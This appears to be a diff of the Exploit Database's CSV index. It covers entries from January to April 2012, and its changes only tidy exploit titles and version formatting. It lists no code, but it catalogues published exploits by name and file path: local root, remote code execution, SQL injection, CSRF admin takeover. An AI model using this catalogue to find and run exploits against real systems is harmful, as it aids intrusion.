-18411,platforms/linux/local/18411.c,"Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit",2012-01-23,zx2c4,linux,local,0 +18410,platforms/php/webapps/18410.txt,"miniCMS 1.0 & 2.0 - PHP Code Inject",2012-01-22,Or4nG.M4N,php,webapps,0 +18411,platforms/linux/local/18411.c,"Mempodipper - Linux Local Root for => 2.6.39 (32-bit & 64-bit)",2012-01-23,zx2c4,linux,local,0 18412,platforms/php/webapps/18412.php,"Wordpress Kish Guest Posting Plugin 1.0 Arbitrary File Upload",2012-01-23,EgiX,php,webapps,0 -18413,platforms/php/webapps/18413.txt,"SpamTitan Application v5.08x - SQL Injection Vulnerability",2012-01-23,Vulnerability-Lab,php,webapps,0 +18413,platforms/php/webapps/18413.txt,"SpamTitan Application 5.08x - SQL Injection Vulnerability",2012-01-23,Vulnerability-Lab,php,webapps,0 18416,platforms/jsp/webapps/18416.txt,"Stoneware WebNetwork6 Multiple Vulnerabilities",2012-01-24,"Jacob Holcomb",jsp,webapps,0 18417,platforms/php/webapps/18417.txt,"WordPress <= 3.3.1 Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps,0 18418,platforms/php/webapps/18418.html,"VR GPub 4.0 CSRF Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0 -18419,platforms/php/webapps/18419.html,"phplist - version 2.10.9 CSRF/XSS Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0 +18419,platforms/php/webapps/18419.html,"phplist 2.10.9 - CSRF/XSS Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0 18420,platforms/windows/remote/18420.rb,"Sysax Multi Server 5.50 Create Folder Remote Code Exec BoF (MSF Module)",2012-01-26,"Craig Freyman",windows,remote,0 -18422,platforms/php/webapps/18422.txt,"Peel SHOPPING - version 2.8 and version 2.9 xss/sql inject Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0 +18422,platforms/php/webapps/18422.txt,"Peel SHOPPING 2.8& 2.9 - XSS/SQL Injections Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0 18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server magentservice.exe Overflow",2012-01-27,metasploit,windows,remote,0 18424,platforms/php/webapps/18424.rb,"vBSEO <= 3.6.0 ""proc_deutf()"" Remote PHP Code Injection Exploit",2012-01-27,EgiX,php,webapps,0 18426,platforms/windows/remote/18426.rb,"MS12-004 midiOutPlayNextPolyEvent Heap Overflow",2012-01-28,metasploit,windows,remote,0 @@ -15956,8 +15956,8 @@ id,file,description,date,author,platform,type,port 18452,platforms/multiple/webapps/18452.txt,"Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-02-02,"SecPod Research",multiple,webapps,0 18453,platforms/windows/dos/18453.txt,"OfficeSIP Server 3.1 Denial Of Service Vulnerability",2012-02-02,"SecPod Research",windows,dos,0 18454,platforms/windows/dos/18454.txt,"NetSarang Xlpd Printer Daemon 4 Denial of Service Vulnerability",2012-02-02,"SecPod Research",windows,dos,0 -18455,platforms/php/webapps/18455.txt,"OSCommerce v3.0.2 - Persistent Cross Site Vulnerability",2012-02-02,Vulnerability-Lab,php,webapps,0 -18456,platforms/php/webapps/18456.txt,"Achievo v1.4.3 - Multiple Web Vulnerabilities",2012-02-02,Vulnerability-Lab,php,webapps,0 +18455,platforms/php/webapps/18455.txt,"OSCommerce 3.0.2 - Persistent Cross Site Vulnerability",2012-02-02,Vulnerability-Lab,php,webapps,0 +18456,platforms/php/webapps/18456.txt,"Achievo 1.4.3 - Multiple Web Vulnerabilities",2012-02-02,Vulnerability-Lab,php,webapps,0 18457,platforms/linux/dos/18457.py,"torrent-stats httpd.c Denial of Service",2012-02-03,otr,linux,dos,0 18458,platforms/php/dos/18458.txt,"PHP 5.4SVN-2012-02-03 htmlspecialchars/entities Buffer Overflow",2012-02-03,cataphract,php,dos,0 18460,platforms/php/dos/18460.php,"PHP 5.4.0RC6 64bit Denial of Service",2012-02-04,"Stefan Esser",php,dos,0 @@ -15971,12 +15971,12 @@ id,file,description,date,author,platform,type,port 18469,platforms/windows/dos/18469.pl,"Typsoft FTP Server 1.10 Multiple Commands DoS",2012-02-07,"Balazs Makany",windows,dos,0 18470,platforms/php/webapps/18470.txt,"Ananta Gazelle CMS - Update Statement Sql injection",2012-02-08,hackme,php,webapps,0 18471,platforms/windows/local/18471.c,"TORCS <= 1.3.2 xml buffer overflow /SAFESEH evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0 -18473,platforms/multiple/webapps/18473.txt,"Cyberoam Central Console v2.00.2 - File Include Vulnerability",2012-02-08,Vulnerability-Lab,multiple,webapps,0 +18473,platforms/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - File Include Vulnerability",2012-02-08,Vulnerability-Lab,multiple,webapps,0 18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 BSOD",2012-02-09,shinnai,windows,dos,0 18476,platforms/windows/remote/18476.py,"Sysax Multi Server <= 5.52 File Rename BoF RCE (Egghunter)",2012-02-09,"Craig Freyman",windows,remote,0 18478,platforms/windows/remote/18478.rb,"Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow",2012-02-10,metasploit,windows,remote,0 18479,platforms/windows/remote/18479.rb,"Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow",2012-02-10,metasploit,windows,remote,0 -18480,platforms/php/webapps/18480.txt,"Dolibarr CMS v3.2.0 Alpha - File Include Vulnerabilities",2012-02-10,Vulnerability-Lab,php,webapps,0 +18480,platforms/php/webapps/18480.txt,"Dolibarr CMS 3.2.0 - Alpha - File Include Vulnerabilities",2012-02-10,Vulnerability-Lab,php,webapps,0 18481,platforms/windows/dos/18481.py,"jetVideo 8.0.2 Denial of Service",2012-02-10,"Senator of Pirates",windows,dos,0 18483,platforms/php/webapps/18483.txt,"Fork CMS 3.2.4 - Multiple Vulnerabilities (LFI - XSS)",2012-02-12,"Avram Marius",php,webapps,0 18485,platforms/windows/remote/18485.rb,"Java MixerSequencer Object GM_Song Structure Handling Vulnerability",2012-02-16,metasploit,windows,remote,0 @@ -15987,8 +15987,8 @@ id,file,description,date,author,platform,type,port 18491,platforms/windows/dos/18491.txt,"XnView <= 1.98.5 Multiple Vulnerabilities",2012-02-16,"Luigi Auriemma",windows,dos,0 18492,platforms/linux/remote/18492.rb,"Horde 3.3.12 Backdoor Arbitrary PHP Code Execution",2012-02-17,metasploit,linux,remote,0 18493,platforms/windows/dos/18493.py,"PCAnywhere 12.5.0 build 463 Denial of Service",2012-02-17,"Johnathan Norman",windows,dos,0 -18494,platforms/php/webapps/18494.txt,"Pandora FMS v4.0.1 - Local File Include Vulnerability",2012-02-17,Vulnerability-Lab,php,webapps,0 -18495,platforms/php/webapps/18495.html,"almnzm 2.4 <= CSRF Vulnerability (Add Admin)",2012-02-18,"HaNniBaL KsA",php,webapps,0 +18494,platforms/php/webapps/18494.txt,"Pandora FMS 4.0.1 - Local File Include Vulnerability",2012-02-17,Vulnerability-Lab,php,webapps,0 +18495,platforms/php/webapps/18495.html,"almnzm 2.4 - CSRF Vulnerability (Add Admin)",2012-02-18,"HaNniBaL KsA",php,webapps,0 18497,platforms/php/webapps/18497.txt,"4PSA CMS SQL Injection Vulnerabilities",2012-02-19,"BHG Security Center",php,webapps,0 18498,platforms/php/webapps/18498.html,"SyndeoCMS <= 3.0 CSRF Vulnerability",2012-02-19,"Ivano Binetti",php,webapps,0 18499,platforms/hardware/webapps/18499.txt,"D-Link DSL-2640B (ADSL Router) CSRF Vulnerability",2012-02-20,"Ivano Binetti",hardware,webapps,0 @@ -15998,14 +15998,14 @@ id,file,description,date,author,platform,type,port 18503,platforms/hardware/webapps/18503.txt,"Cisco Linksys WAG54GS CSRF Change Admin Password",2012-02-21,"Ivano Binetti",hardware,webapps,0 18504,platforms/hardware/webapps/18504.txt,"Sagem F@ST 2604 CSRF Vulnerability (ADSL Router)",2012-02-22,"KinG Of PiraTeS",hardware,webapps,0 18506,platforms/php/webapps/18506.txt,"BRIM < 2.0.0 SQL Injection",2012-02-22,ifnull,php,webapps,0 -18507,platforms/windows/dos/18507.py,"DAMN Hash Calculator v1.5.1 Local Heap Overflow PoC",2012-02-22,"Julien Ahrens",windows,dos,0 +18507,platforms/windows/dos/18507.py,"DAMN Hash Calculator 1.5.1 - Local Heap Overflow PoC",2012-02-22,"Julien Ahrens",windows,dos,0 18508,platforms/php/webapps/18508.txt,"Limesurvey (PHPSurveyor 1.91+ stable) Blind SQL Injection",2012-02-22,TorTukiTu,php,webapps,0 18509,platforms/hardware/webapps/18509.html,"Dlink DCS series CSRF Change Admin Password",2012-02-22,rigan,hardware,webapps,0 18510,platforms/windows/webapps/18510.txt,"WebcamXP and Webcam 7 Directory Traversal Vulnerability",2012-02-22,Silent_Dream,windows,webapps,0 18511,platforms/hardware/webapps/18511.txt,"D-Link DSL-2640B Authentication Bypass",2012-02-22,"Ivano Binetti",hardware,webapps,0 18512,platforms/windows/dos/18512.txt,"Unity 3D Web Player <= 3.2.0.61061 Denial of Service",2012-02-22,"Luigi Auriemma",windows,dos,0 18513,platforms/php/webapps/18513.txt,"DFLabs PTK <= 1.0.5 Multiple Vulnerabilities (Steal Authentication Credentials)",2012-02-22,"Ivano Binetti",php,webapps,0 -18514,platforms/windows/remote/18514.rb,"TrendMicro Control Manger <= v5.5 CmdProcessor.exe Stack Buffer Overflow",2012-02-23,metasploit,windows,remote,0 +18514,platforms/windows/remote/18514.rb,"TrendMicro Control Manger <= 5.5 CmdProcessor.exe - Stack Buffer Overflow",2012-02-23,metasploit,windows,remote,0 18515,platforms/windows/local/18515.rb,"Orbit Downloader URL Unicode Conversion Overflow",2012-02-23,metasploit,windows,local,0 18516,platforms/php/webapps/18516.txt,"phpDenora <= 1.4.6 Multiple SQL Injection Vulnerabilities",2012-02-23,NLSecurity,php,webapps,0 18517,platforms/hardware/webapps/18517.txt,"Snom IP Phone Privilege Escalation - Security Advisory - SOS-12-001",2012-02-23,"Sense of Security",hardware,webapps,0 @@ -16013,13 +16013,13 @@ id,file,description,date,author,platform,type,port 18519,platforms/php/webapps/18519.txt,"PHP Gift Registry 1.5.5 SQL Injection",2012-02-24,G13,php,webapps,0 18520,platforms/windows/remote/18520.rb,"Sun Java Web Start Plugin Command Line Argument Injection (2012)",2012-02-24,metasploit,windows,remote,0 18521,platforms/windows/remote/18521.rb,"HP Data Protector 6.1 EXEC_CMD Remote Code Execution",2012-02-25,metasploit,windows,remote,0 -18522,platforms/php/webapps/18522.php,"cPassMan v1.82 Remote Command Execution Exploit",2012-02-25,ls,php,webapps,0 +18522,platforms/php/webapps/18522.php,"cPassMan 1.82 - Remote Command Execution Exploit",2012-02-25,ls,php,webapps,0 18523,platforms/php/webapps/18523.txt,"webgrind 1.0 (file param) Local File Inclusion Vulnerability",2012-02-25,LiquidWorm,php,webapps,0 -18524,platforms/windows/dos/18524.py,"Tiny HTTP Server <=v1.1.9 Remote Crash PoC",2012-02-25,localh0t,windows,dos,0 +18524,platforms/windows/dos/18524.py,"Tiny HTTP Server <= 1.1.9 - Remote Crash PoC",2012-02-25,localh0t,windows,dos,0 18526,platforms/php/webapps/18526.php,"YVS Image Gallery Sql Injection",2012-02-25,CorryL,php,webapps,0 18527,platforms/php/webapps/18527.txt,"ContaoCMS (aka TYPOlight) <= 2.11 CSRF (Delete Admin - Delete Article)",2012-02-26,"Ivano Binetti",php,webapps,0 18531,platforms/windows/remote/18531.html,"Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0 -18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video v8.05 - Buffer Overflow Vulnerability",2012-02-27,Vulnerability-Lab,windows,local,0 +18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow Vulnerability",2012-02-27,Vulnerability-Lab,windows,local,0 18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0 18535,platforms/windows/remote/18535.py,"Sysax <= 5.53 SSH Username BoF Pre Auth RCE (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 18536,platforms/php/webapps/18536.txt,"WebfolioCMS <= 1.1.4 CSRF (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps,0 @@ -16029,19 +16029,19 @@ id,file,description,date,author,platform,type,port 18541,platforms/windows/dos/18541.py,"Netmechanica NetDecision HTTP Server Denial Of Service Vulnerability",2012-02-29,"SecPod Research",windows,dos,0 18542,platforms/windows/remote/18542.txt,"Netmechanica NetDecision Traffic Grapher Server Information Disclosure Vulnerability",2012-02-29,"SecPod Research",windows,remote,0 18543,platforms/windows/remote/18543.py,"Netmechanica NetDecision Dashboard Server Information Disclosure Vulnerability",2012-02-29,"SecPod Research",windows,remote,0 -18544,platforms/php/webapps/18544.txt,"ImgPals Photo Host Version 1.0 Admin Account Disactivation",2012-02-29,CorryL,php,webapps,0 +18544,platforms/php/webapps/18544.txt,"ImgPals Photo Host 1.0 - Admin Account Disactivation",2012-02-29,CorryL,php,webapps,0 18545,platforms/php/webapps/18545.txt,"Wolf CMS v0.7.5 Multiple Vulnerabilities",2012-02-29,longrifle0x,php,webapps,0 18546,platforms/windows/dos/18546.txt,"Novell Groupwise Address Book Remote Code Execution",2012-03-01,"Francis Provencher",windows,dos,0 18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 .pls Stack Buffer Overflow",2012-03-02,metasploit,windows,local,0 18548,platforms/windows/local/18548.rb,"VLC Media Player RealText Subtitle Overflow",2012-03-02,metasploit,windows,local,0 18549,platforms/php/webapps/18549.txt,"phxEventManager 2.0 beta 5 search.php search_terms SQL Injection",2012-03-02,skysbsb,php,webapps,0 18552,platforms/windows/dos/18552.pl,"Passport PC To Host Malformed .zws file Memory Corruption Vulnerability",2012-03-03,Silent_Dream,windows,dos,0 -18553,platforms/multiple/webapps/18553.txt,"Multiple SQL injection rivettracker <=1.03",2012-03-03,"Ali Raheem",multiple,webapps,0 +18553,platforms/multiple/webapps/18553.txt,"Rivettracker <= 1.03 - Multiple SQL injection",2012-03-03,"Ali Raheem",multiple,webapps,0 18554,platforms/php/webapps/18554.txt,"Timesheet Next Gen 1.5.2 Multiple SQLi",2012-03-03,G13,php,webapps,0 -18555,platforms/windows/remote/18555.txt,"FlashFXP v4.1.8.1701 - Buffer Overflow Vulnerability",2012-03-03,Vulnerability-Lab,windows,remote,0 -18556,platforms/php/webapps/18556.txt,"Endian UTM Firewall v2.4.x & v2.5.0 - Multiple Web Vulnerabilities",2012-03-03,Vulnerability-Lab,php,webapps,0 +18555,platforms/windows/remote/18555.txt,"FlashFXP 4.1.8.1701 - Buffer Overflow Vulnerability",2012-03-03,Vulnerability-Lab,windows,remote,0 +18556,platforms/php/webapps/18556.txt,"Endian UTM Firewall 2.4.x & 2.5.0 - Multiple Web Vulnerabilities",2012-03-03,Vulnerability-Lab,php,webapps,0 18557,platforms/windows/remote/18557.rb,"Sysax 5.53 SSH Username Buffer Overflow (msf)",2012-03-04,metasploit,windows,remote,0 -18558,platforms/php/webapps/18558.txt,"deV!L`z Clanportal Witze Addon Versions 0.9 SQL Injection Vulnerability",2012-03-04,"Easy Laster",php,webapps,0 +18558,platforms/php/webapps/18558.txt,"deV!L`z Clanportal Witze Addon 0.9 - SQL Injection Vulnerability",2012-03-04,"Easy Laster",php,webapps,0 18559,platforms/php/webapps/18559.txt,"AneCMS v.2e2c583 LFI exploit",2012-03-04,"I2sec-Jong Hwan Park",php,webapps,0 18560,platforms/php/webapps/18560.txt,"Symfony2 Local File Disclosure - Security Advisory - SOS-12-002",2012-03-05,"Sense of Security",php,webapps,0 18561,platforms/php/webapps/18561.txt,"lizard cart SQLi (search.php)",2012-03-05,"Number 7",php,webapps,0 @@ -16050,12 +16050,12 @@ id,file,description,date,author,platform,type,port 18565,platforms/php/remote/18565.rb,"LotusCMS 3.0 eval() Remote Command Execution",2012-03-07,metasploit,php,remote,0 18566,platforms/asp/webapps/18566.txt,"Iciniti Store SQL Injection - Security Advisory - SOS-12-003",2012-03-07,"Sense of Security",asp,webapps,0 18567,platforms/windows/webapps/18567.txt,"HomeSeer HS2 and HomeSeer PRO Multiple Vulnerabilities",2012-03-07,Silent_Dream,windows,webapps,0 -18571,platforms/php/webapps/18571.txt,"Promise WebPAM v2.2.0.13 Multiple Remote Vulnerabilities",2012-03-07,LiquidWorm,php,webapps,0 +18571,platforms/php/webapps/18571.txt,"Promise WebPAM 2.2.0.13 - Multiple Remote Vulnerabilities",2012-03-07,LiquidWorm,php,webapps,0 18572,platforms/windows/remote/18572.rb,"Adobe Flash Player .mp4 'cprt' Overflow""",2012-03-08,metasploit,windows,remote,0 18574,platforms/php/webapps/18574.txt,"RazorCMS <= 1.2.1 STABLE File Upload Vulnerability",2012-03-08,"i2sec_Hyo jun Oh",php,webapps,0 18575,platforms/php/webapps/18575.txt,"RazorCMS <= 1.2.1 STABLE CSRF (Delete Web Pages)",2012-03-08,"Ivano Binetti",php,webapps,0 18578,platforms/php/webapps/18578.txt,"PHP Address Book 6.2.12 Multiple security vulnerabilities",2012-03-10,"Stefan Schurtz",php,webapps,0 -18579,platforms/linux/dos/18579.txt,"PyPAM -- Python bindings for PAM - Double Free Corruption",2012-03-10,"Markus Vervier",linux,dos,0 +18579,platforms/linux/dos/18579.txt,"PyPAM - Python bindings for PAM - Double Free Corruption",2012-03-10,"Markus Vervier",linux,dos,0 18582,platforms/cgi/webapps/18582.txt,"Zend Server 5.6.0 Multiple Remote Script Insertion Vulnerabilities",2012-03-12,LiquidWorm,cgi,webapps,0 18583,platforms/php/webapps/18583.txt,"Saman Portal Local File Inclusion Vulnerability",2012-03-12,TMT,php,webapps,0 18584,platforms/windows/dos/18584.txt,"GOM Media Player 2.1.37 Buffer Overflow Vulnerability",2012-03-12,longrifle0x,windows,dos,0 @@ -16080,10 +16080,10 @@ id,file,description,date,author,platform,type,port 18605,platforms/windows/webapps/18605.txt,"Sockso <= 1.5 Directory Traversal",2012-03-15,"Luigi Auriemma",windows,webapps,0 18606,platforms/windows/dos/18606.txt,"Microsoft Terminal Services Use After Free (MS12-020)",2012-03-16,"Luigi Auriemma",windows,dos,0 18607,platforms/php/webapps/18607.txt,"OneFileCMS 1.1.5 - Local File Inclusion Vulnerability",2012-03-16,mr.pr0n,php,webapps,0 -18608,platforms/php/webapps/18608.txt,"Persistent XSS in FlexCMS 3.2.1 for logged in users",2012-03-16,storm,php,webapps,0 +18608,platforms/php/webapps/18608.txt,"FlexCMS 3.2.1 - Persistent XSS for logged in users",2012-03-16,storm,php,webapps,0 18609,platforms/php/webapps/18609.txt,"FlexCMS 3.2.1 Multiple CSRF Vulnerabilities",2012-03-16,"Ivano Binetti",php,webapps,0 -18610,platforms/windows/remote/18610.pl,"Tiny Server v1.1.5 Arbitrary File Disclosure Exploit",2012-03-16,KaHPeSeSe,windows,remote,0 -18611,platforms/windows/local/18611.rb,"RM Downloader Version 3.1.3.3.2010.06.26 (.m3u) Buffer Overflow (MSF)",2012-03-16,KaHPeSeSe,windows,local,0 +18610,platforms/windows/remote/18610.pl,"Tiny Server 1.1.5 - Arbitrary File Disclosure Exploit",2012-03-16,KaHPeSeSe,windows,remote,0 +18611,platforms/windows/local/18611.rb,"RM Downloader 3.1.3.3.2010.06.26 - (.m3u) Buffer Overflow (MSF)",2012-03-16,KaHPeSeSe,windows,local,0 18613,platforms/php/webapps/18613.txt,"ASP Classifieds Sql Injection",2012-03-17,r45c4l,php,webapps,0 18614,platforms/php/webapps/18614.txt,"PRE PRINTING STUDIO Sql Injection",2012-03-17,r45c4l,php,webapps,0 18615,platforms/windows/dos/18615.py,"TypesoftFTP Server 1.1 Remote DoS (APPE)",2012-03-17,"brock haun",windows,dos,0 @@ -16096,15 +16096,15 @@ id,file,description,date,author,platform,type,port 18624,platforms/windows/remote/18624.txt,"2X Client for RDP 10.1.1204 ClientSystem Class ActiveX Control Download and Execute Vulnerability",2012-03-19,rgod,windows,remote,0 18625,platforms/windows/remote/18625.txt,"2X ApplicationServer 10.1 TuxSystem Class ActiveX Control Remote File Overwrite Vulnerability",2012-03-19,rgod,windows,remote,0 18626,platforms/jsp/webapps/18626.txt,"ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet Unauthenticated Remote Directory Traversal Vulnerability",2012-03-19,rgod,jsp,webapps,0 -18628,platforms/windows/dos/18628.py,"PeerFTP Server <=v4.01 Remote Crash PoC",2012-03-20,localh0t,windows,dos,0 +18628,platforms/windows/dos/18628.py,"PeerFTP Server <= 4.01 - Remote Crash PoC",2012-03-20,localh0t,windows,dos,0 18629,platforms/windows/dos/18629.py,"Tiny Server <= 1.1.9 HTTP HEAD DoS",2012-03-20,"brock haun",windows,dos,0 18630,platforms/hardware/dos/18630.txt,"Android FTPServer 1.9.0 Remote DoS",2012-03-20,G13,hardware,dos,0 18631,platforms/php/webapps/18631.txt,"OneForum (topic.php) SQL Injection Vulnerability",2012-03-20,"Red Security TEAM",php,webapps,0 18632,platforms/php/webapps/18632.txt,"OneFileCMS - Failure to Restrict URL Access",2012-03-20,"Abhi M Balakrishnan",php,webapps,0 18633,platforms/windows/dos/18633.txt,"Adobe Photoshop 12.1 Tiff Parsing Use-After-Free",2012-03-20,"Francis Provencher",windows,dos,0 18634,platforms/windows/remote/18634.rb,"Dell Webcam CrazyTalk ActiveX BackImage Vulnerability",2012-03-21,metasploit,windows,remote,0 -18636,platforms/windows/dos/18636.txt,"Oreans Themida v2.1.8.0 TMD File Handling Buffer Overflow Vulnerability",2012-03-21,LiquidWorm,windows,dos,0 -18637,platforms/windows/dos/18637.txt,"Oreans WinLicense v2.1.8.0 XML File Handling Unspecified Memory Corruption",2012-03-21,LiquidWorm,windows,dos,0 +18636,platforms/windows/dos/18636.txt,"Oreans Themida 2.1.8.0 - TMD File Handling Buffer Overflow Vulnerability",2012-03-21,LiquidWorm,windows,dos,0 +18637,platforms/windows/dos/18637.txt,"Oreans WinLicense 2.1.8.0 - XML File Handling Unspecified Memory Corruption",2012-03-21,LiquidWorm,windows,dos,0 18638,platforms/hardware/webapps/18638.txt,"D-Link DIR-605 CSRF Vulnerability",2012-03-21,iqzer0,hardware,webapps,0 18639,platforms/php/webapps/18639.txt,"phpList 2.10.17 Remote SQL Injection and XSS Vulnerability",2012-03-21,LiquidWorm,php,webapps,0 18640,platforms/windows/remote/18640.txt,"Google Talk gtalk:// Deprecated Uri Handler Parameter Injection Vulnerability",2012-03-22,rgod,windows,remote,0 @@ -16116,7 +16116,7 @@ id,file,description,date,author,platform,type,port 18647,platforms/php/webapps/18647.txt,"PHP Grade Book 1.9.4 Unauthenticated SQL Database Export",2012-03-22,"Mark Stanislav",php,webapps,0 18648,platforms/php/webapps/18648.txt,"phpMoneyBooks 1.0.2 Local File Inclusion",2012-03-22,"Mark Stanislav",php,webapps,0 18649,platforms/php/webapps/18649.txt,"FreePBX 2.10.0, 2.9.0 Multiple Vulnerabilities",2012-03-22,"Martin Tschirsich",php,webapps,0 -18650,platforms/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit",2012-03-23,muts,php,webapps,0 +18650,platforms/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit",2012-03-23,muts,php,webapps,0 18651,platforms/asp/webapps/18651.txt,"Sitecom WLM-2501 new Multiple CSRF Vulnerabilities",2012-03-23,"Ivano Binetti",asp,webapps,0 18652,platforms/php/webapps/18652.txt,"Wolfcms <= 0.75 Multiple Vulnerabilities (CSRF - XSS)",2012-03-23,"Ivano Binetti",php,webapps,0 18654,platforms/windows/dos/18654.txt,"Spotify 0.8.2.610 (search func) Memory Exhaustion Exploit",2012-03-23,LiquidWorm,windows,dos,0 @@ -16131,26 +16131,26 @@ id,file,description,date,author,platform,type,port 18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow",2012-03-26,metasploit,windows,remote,0 18667,platforms/php/webapps/18667.html,"Family CMS 2.9 and earlier multiple Vulnerabilities",2012-03-26,"Ahmed Elhady Mohamed",php,webapps,0 18668,platforms/php/webapps/18668.txt,"vBshop Multiple Persistent XSS Vulnerabilities",2012-03-26,ToiL,php,webapps,0 -18670,platforms/php/webapps/18670.txt,"PicoPublisher v2.0 Remote SQL Injection",2012-03-28,ZeTH,php,webapps,0 +18670,platforms/php/webapps/18670.txt,"PicoPublisher 2.0 - Remote SQL Injection",2012-03-28,ZeTH,php,webapps,0 18671,platforms/windows/dos/18671.pl,"KnFTPd 1.0.0 'FEAT' DoS PoC-Exploit",2012-03-28,"Stefan Schurtz",windows,dos,0 18672,platforms/windows/remote/18672.txt,"Quest InTrust 10.4.x ReportTree and SimpleTree Classes",2012-03-28,rgod,windows,remote,0 18673,platforms/hardware/remote/18673.txt,"D-Link DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability",2012-03-28,rgod,hardware,remote,0 18674,platforms/windows/remote/18674.txt,"Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution",2012-03-28,rgod,windows,remote,0 18675,platforms/hardware/remote/18675.txt,"TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow",2012-03-28,rgod,hardware,remote,0 -18676,platforms/php/webapps/18676.txt,"boastMachine v3.1 <= CSRF Add Admin Vulnerability",2012-03-28,Dr.NaNo,php,webapps,0 +18676,platforms/php/webapps/18676.txt,"boastMachine <= 3.1 - CSRF Add Admin Vulnerability",2012-03-28,Dr.NaNo,php,webapps,0 18679,platforms/multiple/remote/18679.rb,"Java AtomicReferenceArray Type Violation Vulnerability",2012-03-30,metasploit,multiple,remote,0 18680,platforms/php/webapps/18680.txt,"Coppermine 1.5.18 Multiple Vulnerabilities",2012-03-30,waraxe,php,webapps,0 18681,platforms/windows/local/18681.txt,"Bitsmith PS Knowbase 3.2.3 - Buffer Overflow Vulnerability",2012-03-30,Vulnerability-Lab,windows,local,0 18682,platforms/php/webapps/18682.txt,"ArticleSetup Multiple Persistence Cross-Site Scripting and SQL Injection Vulnerabilities",2012-03-30,"SecPod Research",php,webapps,0 -18683,platforms/windows/remote/18683.py,"MailMax <=v4.6 POP3 ""USER"" Remote Buffer Overflow Exploit (No Login Needed)",2012-03-30,localh0t,windows,remote,0 +18683,platforms/windows/remote/18683.py,"MailMax <= 4.6 - POP3 ""USER"" Remote Buffer Overflow Exploit (No Login Needed)",2012-03-30,localh0t,windows,remote,0 18685,platforms/php/webapps/18685.txt,"dalbum 144 build 174 and earlier CSRF Vulnerabilities",2012-03-30,"Ahmed Elhady Mohamed",php,webapps,0 18686,platforms/php/webapps/18686.txt,"SyndeoCMS <= 3.0.01 Persistent XSS",2012-03-30,"Ivano Binetti",php,webapps,0 18687,platforms/php/webapps/18687.txt,"Landshop v0.9.2 - Multiple Web Vulnerabilities",2012-03-31,Vulnerability-Lab,php,webapps,0 -18688,platforms/hardware/dos/18688.txt,"Denial of Service in EMC Data Protection Advisor 5.8.1",2012-03-31,"Luigi Auriemma",hardware,dos,0 +18688,platforms/hardware/dos/18688.txt,"EMC Data Protection Advisor 5.8.1 - Denial of Service",2012-03-31,"Luigi Auriemma",hardware,dos,0 18689,platforms/php/webapps/18689.txt,"Woltlab Burning Board 2.2 / 2.3 [WN]KT KickTipp 3.1 remote SQL Injection",2012-03-31,"Easy Laster",php,webapps,0 18690,platforms/php/webapps/18690.txt,"Buddypress plugin of Wordpress remote SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0 -18691,platforms/windows/dos/18691.rb,"Denial of Service in FoxPlayer version 2.6.0",2012-04-01,"Ahmed Elhady Mohamed",windows,dos,0 -18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 Malicious aiff File Denial of service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0 +18691,platforms/windows/dos/18691.rb,"FoxPlayer 2.6.0 - Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",windows,dos,0 +18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - (.aiff) Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0 18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional SEH&DEP&ASLR",2012-04-03,b33f,windows,local,0 18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda <= 2.2.8 CSRF (Add Admin - Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0 18695,platforms/windows/remote/18695.py,"Sysax <= 5.57 Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 @@ -16173,12 +16173,12 @@ id,file,description,date,author,platform,type,port 18717,platforms/windows/dos/18717.txt,"AnvSoft Any Video Converter 4.3.6 - Multiple Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0 18718,platforms/windows/remote/18718.txt,"Distinct TFTP Server <= 3.01 Directory Traversal Vulnerability",2012-04-08,modpr0be,windows,remote,0 18719,platforms/windows/dos/18719.pl,"Play [EX] 2.1 Playlist File (M3U/PLS/LST) DoS Exploit",2012-04-08,Death-Shadow-Dark,windows,dos,0 -18720,platforms/php/webapps/18720.txt,"Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability",2012-04-08,Dr.NaNo,php,webapps,0 +18720,platforms/php/webapps/18720.txt,"Utopia News Pro <= 1.4.0 - CSRF Add Admin Vulnerability",2012-04-08,Dr.NaNo,php,webapps,0 